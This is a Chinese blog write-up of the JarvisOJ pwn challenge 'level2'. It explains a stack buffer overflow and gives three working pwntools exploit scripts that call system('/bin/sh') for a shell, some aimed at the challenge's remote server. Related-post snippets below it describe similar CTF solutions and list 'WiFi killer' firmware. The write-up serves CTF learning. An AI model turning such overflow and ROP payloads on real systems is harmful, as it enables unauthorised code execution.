JarvisOJ-PWN-Level2

最新推荐文章于 2022-04-19 19:12:39 发布
最新推荐文章于 2022-04-19 19:12:39 发布
阅读量655 收藏 2
点赞数
分类专栏: Jarvis OJ writup (PWN)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/79614855
版权

JarvisOJ-PWN-Level2

IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。

shift+12查看字符串
这里写图片描述
看到/bin/sh
双击得到地址:
这里写图片描述

再看到这个:
这里写图片描述
这里写图片描述
那么就是要传参数到system()里了。

所以构造代码如下:

# -*- coding:utf-8 -*-
from pwn import *
# sh = process('./level2')  # local
sh = remote('pwn2.jarvisoj.com', 9878)  # remote
padd = 'a'*(0x88+4)
system_ad = p32(0x08048320)
bin_sh = p32(0x804a024)
payload = padd+system_ad+'a'*4+bin_sh#跳到system地址,返回地址为0xaaaa,参数为/bin/sh
sh.sendline(payload)
sh.interactive()

如果不知道system的话也可以用elf模块查看:

# -*- coding:utf-8 -*-
from pwn import *
# sh = process('./level2')  # local
sh = remote('pwn2.jarvisoj.com', 9878)  # remote
level2 = ELF('./level2')
padd = 'a'*(0x88+4)
system_ad = p32(level2.plt['system'])
bin_sh =p32(0x804a024)
payload = padd+system_ad+'a'*4+bin_sh
sh.sendline(payload)
sh.interactive()

或者也可以用pop pop pop ,参考文章
http://blog.csdn.net/linyt/article/details/48738757
http://blog.csdn.net/swartz_lubel/article/details/54972511

from pwn import *
sh = process('./level2')
level2 = ELF('./level2')
bss = level2.bss()+1#0x804a024
print hex(bss)
padding = 'a'*(0x88+4)
read_addr = p32(level2.plt['read'])
rop = p32(0x08048519)#rop rop rop ret
argv = p32(0)+p32(bss)+p32(10)#这里第三个参数一定要大于/bin/sh\x00长度
system_addr = p32(level2.plt['system'])
argv_r = p32(bss)#p32(0x804a024)
payload = padding+read_addr+rop+argv+system_addr+'a'*4+argv_r
sh.sendline(payload)
# time.sleep(0.2)
sh.send('/bin/sh\x00')
sh.interactive()

参考文章:
http://blog.csdn.net/linyt/article/details/48738757
http://blog.csdn.net/swartz_lubel/article/details/54972511
http://jaq.alibaba.com/community/art/show?spm=a313e.7916646.24000001.11.MtR4jX&articleid=403
http://blog.csdn.net/qq_31481187/article/details/53189113#0x04-xmanlevel2
http://www.mamicode.com/info-detail-1971189.html
https://jaq.alibaba.com/community/art/show?articleid=473

Jaken1223
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1413
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
pwn题解level(2)
qq_43627239的博客
07-25 558
今天oj里边的level2和level3的32位和64位四道题 写一下32位 其中包含libc 写题解之前 先补充两个内容 1.checksec 是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为canary,所以如果开...
pwn level1、level2
qq_43613772的博客
07-24 971
下载文件之后马上查一下保护,NX为打开状态,NX为文件保护的一种方式。 用IDA打开进行反汇编,找溢出点。 看到很显眼的system后,于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,记下地址。 逻辑示意图: 注意不能在vulnerabl...
攻防世界PWN-level2
Deeeelete的博客
11-13 744
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界 Pwn level2
MrTreebook的博客
07-16 475
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
PWN做题笔记3-level2(已修订)
qq_40923256的博客
04-19 2272
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1 32位ELF文件 未开启ALSR ida反汇编: 只有main函数,但是给出了system函数,因此是一个ret2libc类型的题目,目标是通过溢出构造_system函数的参数并调用。 查找/bin/sh字符串,地址0x0804A024: _system地址0x0804832..
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1069
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1407
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
jarvisoj-level2
qq_35661990的博客
11-09 1369
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2428
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4972
XCTF-pwn-level2 WP 终于可以写这个pwn题的wp咯~ 很开心,说明我又有一些收获来解决了一些问题 题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
Jarvis OJ [XMAN]level2
九层台
07-06 308
查询保护 liu@liu-F117-F:~/桌面/oj/level2$ checksec level2 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2/level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found...
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 558
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
Jarvis oj level2 (x64) wp
ditto的博客
01-05 270
64位程序前6个参数通过寄存器来传递,多于6个的使用堆栈传递。前6个从左到右依次为RDI,RSI,RDX,RCX,R8,R9。多于六个的从右往左依次压入堆栈 拿到题目检查保护: 放ida里,还是之前一样的程序: 程序本身有字符串/bin/sh 找下pop rdi ret 在哪: 编写exp: from pwn import* a=remote("pwn2.jarvisoj.com",...
mqtt-pwn安装
最新发布
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值